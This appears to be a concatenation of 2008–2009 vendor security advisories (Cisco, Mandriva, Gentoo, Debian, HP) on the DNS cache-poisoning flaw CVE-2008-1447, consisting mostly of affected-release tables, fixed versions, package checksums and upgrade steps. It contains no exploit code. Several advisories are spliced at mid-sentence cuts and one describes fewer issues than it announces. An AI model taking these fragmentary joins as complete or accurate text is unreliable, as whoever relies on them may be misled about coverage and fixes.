|\n|------------+-------------+-------------|\n| 12.3JEC    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.3JK     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.3JL     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.3JX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3T      | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.3TPC    | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n| 12.3VA     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.3XA     | first fixed |             |\n|            | in 12.4     | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3XB     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.3XC     | first fixed |             |\n|            | in 12.4     | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3XD     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.3XE     | first fixed |             |\n|            | in 12.4     | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3XF     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.3XG     | first fixed |             |\n|            | in 12.4T    | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3XH     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.3XI     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n|            |             | 12.3(14)    |\n|            |             | YX12        |\n|            | Vulnerable; |             |\n| 12.3XJ     | first fixed | 12.4(20)T;  |\n|            | in 12.3YX   | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3XK     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3XQ     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.3XR     | first fixed |             |\n|            | in 12.4     | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3XS     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.3XU     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            |             | 12.3(14)    |\n|            |             | YX12        |\n|            | Vulnerable; |             |\n| 12.3XW     | first fixed | 12.4(20)T;  |\n|            | in 12.3YX   | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n| 12.3XY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.3YA     | first fixed |             |\n|            | in 12.4     | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.3YD     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            |             | 12.3(14)    |\n|            |             | YX12        |\n|            | Vulnerable; |             |\n| 12.3YF     | first fixed | 12.4(20)T;  |\n|            | in 12.3YX   | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.3YG     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.3YH     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.3YI     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n| 12.3YJ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.3YK     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.3(14)    |             |\n|            | YM12 are    |             |\n|            | vulnerable, | 12.3(14)    |\n| 12.3YM     | release     | YM12        |\n|            | 12.3(14)    |             |\n|            | YM12 and    |             |\n|            | later are   |             |\n|            | not         |             |\n|            | vulnerable; |             |\n|------------+-------------+-------------|\n| 12.3YQ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.3YS     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.3YT     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; |             |\n| 12.3YU     | first fixed |             |\n|            | in 12.4XB   |             |\n|------------+-------------+-------------|\n| 12.3YX     | 12.3(14)    | 12.3(14)    |\n|            | YX12        | YX12        |\n|------------+-------------+-------------|\n| 12.3YZ     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n|  Affected  | First Fixed | Recommended |\n| 12.4-Based |   Release   |   Release   |\n|  Releases  |             |             |\n|------------+-------------+-------------|\n|            | 12.4(18b)   |             |\n|            |             |             |\n|            | 12.4(19a)   | 12.4(19a)   |\n| 12.4       |             |             |\n|            | 12.4(19b)   | 12.4(19b)   |\n|            |             |             |\n|            | 12.4(21)    |             |\n|------------+-------------+-------------|\n| 12.4JA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4JK     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4JMA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4JMB    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4JMC    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4JX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4MD     | 12.4(15)MD  | 12.4(15)MD  |\n|------------+-------------+-------------|\n| 12.4MR     | 12.4(19)MR  | 12.4(19)MR  |\n|------------+-------------+-------------|\n| 12.4SW     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n|            | 12.4(15)T6  |             |\n|            |             | 12.4(20)T;  |\n| 12.4T      | 12.4(20)T;  | Available   |\n|            | Available   | on          |\n|            | on          | 11-JUL-08   |\n|            | 11-JUL-08   |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.4XA     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n| 12.4XB     | 12.4(2)XB10 |             |\n|------------+-------------+-------------|\n| 12.4XC     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n|            | 12.4(4)     | 12.4(20)T;  |\n|            | XD11;       | Available   |\n| 12.4XD     | Available   | on          |\n|            | on          | 11-JUL-08   |\n|            | 31-JUL-08   |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.4XE     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n| 12.4XF     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4XG     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.4XJ     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n| 12.4XK     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.4XL     | 12.4(15)XL2 | 12.4(15)XL2 |\n|------------+-------------+-------------|\n| 12.4XM     | 12.4(15)XM1 | 12.4(15)XM1 |\n|------------+-------------+-------------|\n| 12.4XN     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n| 12.4XQ     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n| 12.4XT     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n| 12.4XV     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n| 12.4XW     | 12.4(11)XW8 | 12.4(11)XW6 |\n|------------+-------------+-------------|\n| 12.4XY     | 12.4(15)XY3 |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(20)T;  |\n| 12.4XZ     | first fixed | Available   |\n|            | in 12.4T    | on          |\n|            |             | 11-JUL-08   |\n+----------------------------------------+\n\nCisco Network Registrar\n+----------------------\n\n+---------------------------------------+\n|   Affected   |                        |\n|   Release    |  First Fixed Release   |\n|    Train     |                        |\n|--------------+------------------------|\n| 6.1.x        | Contact TAC            |\n|--------------+------------------------|\n|              | 6.3.1.1 patch;         |\n| 6.3.x        | available mid-July     |\n|              | 2008                   |\n|--------------+------------------------|\n| 7.0.x        | 7.0.1; available in    |\n|              | mid-July 2008          |\n+---------------------------------------+\n\nCisco Network Registrar software is available for download at:\n\nhttp://www.cisco.com/pcgi-bin/Software/Tablebuild/tablebuild.pl/nr-eval\n\nCisco Application and Content Networking System\n+----------------------------------------------\n\nThis issue is fixed in version 5.5.11 of Cisco ACNS software. This\nrelease will be available for download from www.cisco.com in late July\n2008. \n\nCisco ACNS 5.5 software is available for download at:\n\nhttp://www.cisco.com/pcgi-bin/tablebuild.pl/acns55\n\nWorkarounds\n===========\n\nThere are no workarounds. \n\nAdditional information about identification and mitigation of attacks\nagainst DNS is in the Cisco Applied Intelligence white paper \"DNS Best\nPractices, Network Protections, and Attack Identification,\" available at\nhttp://www.cisco.com/web/about/security/intelligence/dns-bcp.html. \n\nObtaining Fixed Software\n========================\n\nCisco has released free software updates that address these\nvulnerabilities. Prior to deploying software, customers should consult\ntheir maintenance provider or check the software for feature set\ncompatibility and known issues specific to their environment. \n\nCustomers may only install and expect support for the feature sets\nthey have purchased. By installing, downloading, accessing or\notherwise using such software upgrades, customers agree to be bound\nby the terms of Cisco\u0027s software license terms found at\nhttp://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,\nor as otherwise set forth at Cisco.com Downloads at\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml. \n\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\nupgrades. \n\nCustomers with Service Contracts\n+-------------------------------\n\nCustomers with contracts should obtain upgraded software through their\nregular update channels. For most customers, this means that upgrades\nshould be obtained through the Software Center on Cisco\u0027s worldwide\nwebsite at http://www.cisco.com. \n\nCustomers using Third Party Support Organizations\n+------------------------------------------------\n\nCustomers whose Cisco products are provided or maintained through prior\nor existing agreements with third-party support organizations, such\nas Cisco Partners, authorized resellers, or service providers should\ncontact that support organization for guidance and assistance with the\nappropriate course of action in regards to this advisory. \n\nThe effectiveness of any workaround or fix is dependent on specific\ncustomer situations, such as product mix, network topology, traffic\nbehavior, and organizational mission. Due to the variety of affected\nproducts and releases, customers should consult with their service\nprovider or support organization to ensure any applied workaround or fix\nis the most appropriate for use in the intended network before it is\ndeployed. \n\nCustomers without Service Contracts\n+----------------------------------\n\nCustomers who purchase direct from Cisco but do not hold a Cisco service\ncontract, and customers who purchase through third-party vendors but are\nunsuccessful in obtaining fixed software through their point of sale\nshould acquire upgrades by contacting the Cisco Technical Assistance\nCenter (TAC). TAC contacts are as follows. \n\n  * +1 800 553 2447 (toll free from within North America)\n  * +1 408 526 7209 (toll call from anywhere in the world)\n  * e-mail: tac@cisco.com\n\nCustomers should have their product serial number available and be\nprepared to give the URL of this notice as evidence of entitlement to a\nfree upgrade. Free upgrades for non-contract customers must be requested\nthrough the TAC. \n\nRefer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml\nfor additional TAC contact information, including localized telephone\nnumbers, and instructions and e-mail addresses for use in various\nlanguages. \n\nExploitation and Public Announcements\n=====================================\n\nThe Cisco PSIRT is not aware of any public announcements or malicious\nuse of the vulnerability described in this advisory. Cisco would like to\nthank Dan Kaminsky for notifying vendors about his findings. \n\nNote that vulnerability information for Cisco IOS Software is being\nprovided in this advisory outside of the announced publication schedule\nfor Cisco IOS Software described at http://www.cisco.com/go/psirt due to\nindustry-wide disclosure of the vulnerability. \n\nStatus of this Notice: FINAL\n============================\n\nTHIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\nDOCUMENT AT ANY TIME. \n\nA stand-alone copy or Paraphrase of the text of this document that omits\nthe distribution URL in the following section is an uncontrolled copy,\nand may lack important information or contain factual errors. \n\nDistribution\n============\n\nThis advisory is posted on Cisco\u0027s worldwide website at\n\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml\n\nIn addition to worldwide web posting, a text version of this notice is\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\ne-mail and Usenet news recipients. \n\n  * cust-security-announce@cisco.com\n  * first-teams@first.org\n  * bugtraq@securityfocus.com\n  * vulnwatch@vulnwatch.org\n  * cisco@spot.colorado.edu\n  * cisco-nsp@puck.nether.net\n  * full-disclosure@lists.grok.org.uk\n  * comp.dcom.sys.cisco@newsgate.cisco.com\n\nFuture updates of this advisory, if any, will be placed on Cisco\u0027s\nworldwide website, but may or may not be actively announced on mailing\nlists or newsgroups. Users concerned about this problem are encouraged\nto check the above URL for any updates. \n\nRevision History\n================\n\n+-----------------------------------------------------------+\n| Revision 1.0  | 2008-July-08  | Initial public release    |\n+-----------------------------------------------------------+\n\nCisco Security Procedures\n=========================\n\nComplete information on reporting security vulnerabilities in\nCisco products, obtaining assistance with security incidents, and\nregistering to receive security information from Cisco, is available\non Cisco\u0027s worldwide website at\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. \nThis includes instructions for press inquiries regarding Cisco security\nnotices. All Cisco security advisories are available at\nhttp://www.cisco.com/go/psirt. \n\n+--------------------------------------------------------------------\nCopyright 2007-2008 Cisco Systems, Inc. All rights reserved. \n+--------------------------------------------------------------------\n\nUpdated: Jul 08, 2008                             Document ID: 107064\n\n+--------------------------------------------------------------------\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niEYEARECAAYFAkhztUIACgkQ86n/Gc8U/uCAgACfVRRoJO4w4defnpwbNlfgBm4t\n2SMAnjKCKECHtsjN9umqqPrPd2DW4IcC\n=XGZw\n-----END PGP SIGNATURE-----\n.  This could be used to misdirect users and services;\n i.e. \n \n This update provides the latest stable BIND releases for all platforms\n except Corporate Server/Desktop 3.0 and MNF2, which have been patched\n to correct the issue. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2007.1:\n 73cc24fc9586b7ab290d755012c16a79  2007.1/i586/bind-9.4.2-0.1mdv2007.1.i586.rpm\n 70867c50cfd64b4406aa002d627d740b  2007.1/i586/bind-devel-9.4.2-0.1mdv2007.1.i586.rpm\n 3603e9d9115466753397a1f472011703  2007.1/i586/bind-utils-9.4.2-0.1mdv2007.1.i586.rpm \n cf5e4100ecb21a4eb603831e5a6ec23d  2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n 4eb7ce0984d3ce3befff667392e3bf3e  2007.1/x86_64/bind-9.4.2-0.1mdv2007.1.x86_64.rpm\n d7b9a9e7d4c52a5b0c54f59ca20bf2d5  2007.1/x86_64/bind-devel-9.4.2-0.1mdv2007.1.x86_64.rpm\n c5c66c9609615029d2f07f7b09a63118  2007.1/x86_64/bind-utils-9.4.2-0.1mdv2007.1.x86_64.rpm \n cf5e4100ecb21a4eb603831e5a6ec23d  2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm\n\n Mandriva Linux 2008.0:\n 52dfe3970fcd9495b2bb9379a9312b25  2008.0/i586/bind-9.4.2-1mdv2008.0.i586.rpm\n 97d20d35b6814aa2f9fab549ca6237c0  2008.0/i586/bind-devel-9.4.2-1mdv2008.0.i586.rpm\n 87a7bb3dd25abd8cd882a8f2fdc2398e  2008.0/i586/bind-utils-9.4.2-1mdv2008.0.i586.rpm \n da4444a8074e6ede39dfa557fb258db7  2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n b9d0337363bc1e2b14505f25d4ee5f99  2008.0/x86_64/bind-9.4.2-1mdv2008.0.x86_64.rpm\n 9b75e2a96784c00c2912bc3bf333d089  2008.0/x86_64/bind-devel-9.4.2-1mdv2008.0.x86_64.rpm\n 0a593b090d9e6bda3666e234056e19ba  2008.0/x86_64/bind-utils-9.4.2-1mdv2008.0.x86_64.rpm \n da4444a8074e6ede39dfa557fb258db7  2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm\n\n Mandriva Linux 2008.1:\n 2534ef007262d4ea2d219bab0190466c  2008.1/i586/bind-9.5.0-3mdv2008.1.i586.rpm\n c3feee5d05aa3aee14cd70a2d295d0b1  2008.1/i586/bind-devel-9.5.0-3mdv2008.1.i586.rpm\n f306c06665b723a2530258e6d1dbdae2  2008.1/i586/bind-doc-9.5.0-3mdv2008.1.i586.rpm\n 967ef80628f92160930bc3a3827a216e  2008.1/i586/bind-utils-9.5.0-3mdv2008.1.i586.rpm \n 70fc7a7964944a2926979710c5148ed1  2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm\n\n Mandriva Linux 2008.1/X86_64:\n 3f4d96d7a7f913c141e1f63cdc7e7336  2008.1/x86_64/bind-9.5.0-3mdv2008.1.x86_64.rpm\n 420db658366763686198f41394aa72b3  2008.1/x86_64/bind-devel-9.5.0-3mdv2008.1.x86_64.rpm\n 6f3674f68311494c5a9ff0dbce831e82  2008.1/x86_64/bind-doc-9.5.0-3mdv2008.1.x86_64.rpm\n 4294b3a086b89bf53c5c967c17962447  2008.1/x86_64/bind-utils-9.5.0-3mdv2008.1.x86_64.rpm \n 70fc7a7964944a2926979710c5148ed1  2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm\n\n Corporate 3.0:\n de2a4372d1c25d73f343c9fcb044c9dd  corporate/3.0/i586/bind-9.2.3-6.5.C30mdk.i586.rpm\n 1f24f6dbdb6c02e21cbbef99555049cb  corporate/3.0/i586/bind-devel-9.2.3-6.5.C30mdk.i586.rpm\n 00405b98290d5a41f226081baa57e18d  corporate/3.0/i586/bind-utils-9.2.3-6.5.C30mdk.i586.rpm \n 6a237dc290f4f7c463b1996e6a4a4515  corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 628162f3d6a414828d2231fefc46842b  corporate/3.0/x86_64/bind-9.2.3-6.5.C30mdk.x86_64.rpm\n dd29ff31a9cffcc1b20fd045869d7013  corporate/3.0/x86_64/bind-devel-9.2.3-6.5.C30mdk.x86_64.rpm\n c475c1a4d048e04da1fc27dcbb17c3f3  corporate/3.0/x86_64/bind-utils-9.2.3-6.5.C30mdk.x86_64.rpm \n 6a237dc290f4f7c463b1996e6a4a4515  corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm\n\n Corporate 4.0:\n 271ead204904be302d197cd542f5ae23  corporate/4.0/i586/bind-9.3.5-0.4.20060mlcs4.i586.rpm\n 42413dcc1cf053e735216f767eff4e5d  corporate/4.0/i586/bind-devel-9.3.5-0.4.20060mlcs4.i586.rpm\n 0201afe493a41e1deedc9bf7e9725f4a  corporate/4.0/i586/bind-utils-9.3.5-0.4.20060mlcs4.i586.rpm \n 86bc0cdc9ed1b959b6f56e0660268f2e  corporate/4.0/SRPMS/bind-9.3.5-0.4.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n b1a18a7d0578dab7bd825eda6c682b3d  corporate/4.0/x86_64/bind-9.3.5-0.4.20060mlcs4.x86_64.rpm\n 6a2ebd550feb9147058de05b1a1ef04d  corporate/4.0/x86_64/bind-devel-9.3.5-0.4.20060mlcs4.x86_64.rpm\n 670a1b934ce4974b8505018ab69ade0b  corporate/4.0/x86_64/bind-utils-9.3.5-0.4.20060mlcs4.x86_64.rpm \n 86bc0cdc9ed1b959b6f56e0660268f2e  corporate/4.0/SRPMS/bind-9.3.5-0.4.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n 5b694c24cc2092e38f531dbfdd5c9d41  mnf/2.0/i586/bind-9.2.3-6.5.C30mdk.i586.rpm\n c08bc805027059c47bed32215f17eacb  mnf/2.0/i586/bind-utils-9.2.3-6.5.C30mdk.i586.rpm \n 39225289516498e1b071c5059306f2b9  mnf/2.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 200901-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n  Severity: Normal\n     Title: pdnsd: Denial of Service and cache poisoning\n      Date: January 11, 2009\n      Bugs: #231285\n        ID: 200901-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nTwo errors in pdnsd allow for Denial of Service and cache poisoning. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package        /  Vulnerable  /                        Unaffected\n    -------------------------------------------------------------------\n  1  net-dns/pdnsd       \u003c 1.2.7                              \u003e= 1.2.7\n\nDescription\n===========\n\nTwo issues have been reported in pdnsd:\n\n* The p_exec_query() function in src/dns_query.c does not properly\n  handle many entries in the answer section of a DNS reply, related to\n  a \"dangling pointer bug\" (CVE-2008-4194). The first issue\ncan be exploited by enticing pdnsd to send a query to a malicious DNS\nserver, or using the port randomization weakness, and might lead to a\nDenial of Service. \n\nWorkaround\n==========\n\nPort randomization can be enabled by setting the \"query_port_start\"\noption to 1024 which would resolve the CVE-2008-1447 issue. \n\nResolution\n==========\n\nAll pdnsd users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=net-dns/pdnsd-1.2.7\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2008-1447\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n  [ 2 ] CVE-2008-4194\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4194\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200901-03.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2009 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting. \n\nThis update changes Debian\u0027s dnsmasq packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult. \n\nThis update also switches the random number generator to Dan\nBernstein\u0027s SURF. \n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.35-1+etch4. Packages for alpha will be provided later. \n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.43-1. \n\nWe recommend that you upgrade your dnsmasq package. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.dsc\n    Size/MD5 checksum:      596 3834461c89e55467b4b65ed4ac209e81\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35.orig.tar.gz\n    Size/MD5 checksum:   252901 ad1fafeaf3442685cfe16613e0f8b777\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.diff.gz\n    Size/MD5 checksum:    19202 4ced7768f49198bd43bbbd24f2a3d3e4\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_amd64.deb\n    Size/MD5 checksum:   188278 8fb55f694db9fdfccaa86d134e937777\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_arm.deb\n    Size/MD5 checksum:   181746 4caf23f31de937b817e12ade7d132eac\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_hppa.deb\n    Size/MD5 checksum:   190490 66730e785683655b058d11aa70346be4\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_i386.deb\n    Size/MD5 checksum:   184546 1fbdd71e81a1e05d68b0f88eaeb00b10\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_ia64.deb\n    Size/MD5 checksum:   223758 011f283b71ef0f9e07d5a9dce25db505\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mips.deb\n    Size/MD5 checksum:   189846 5c67cca2eaedc1dff80c5fd05aa1d33f\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mipsel.deb\n    Size/MD5 checksum:   191824 dfd87d69a7751f1e6ef2d0f1ede052ff\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_powerpc.deb\n    Size/MD5 checksum:   186890 93701abcca5421beddab015a7f35af99\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_s390.deb\n    Size/MD5 checksum:   186396 6f19f6c8d803c3d57e01e73fe1e11886\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_sparc.deb\n    Size/MD5 checksum:   182910 f360078c14f715e90e60124b4ede2be9\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c01506861\nVersion: 3\n\nHPSBUX02351 SSRT080058 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2008-07-16\nLast Updated: 2008-08-06\n\nPotential Security Impact: Remote DNS cache poisoning\n\nSource: Hewlett-Packard Company, HP Software Security 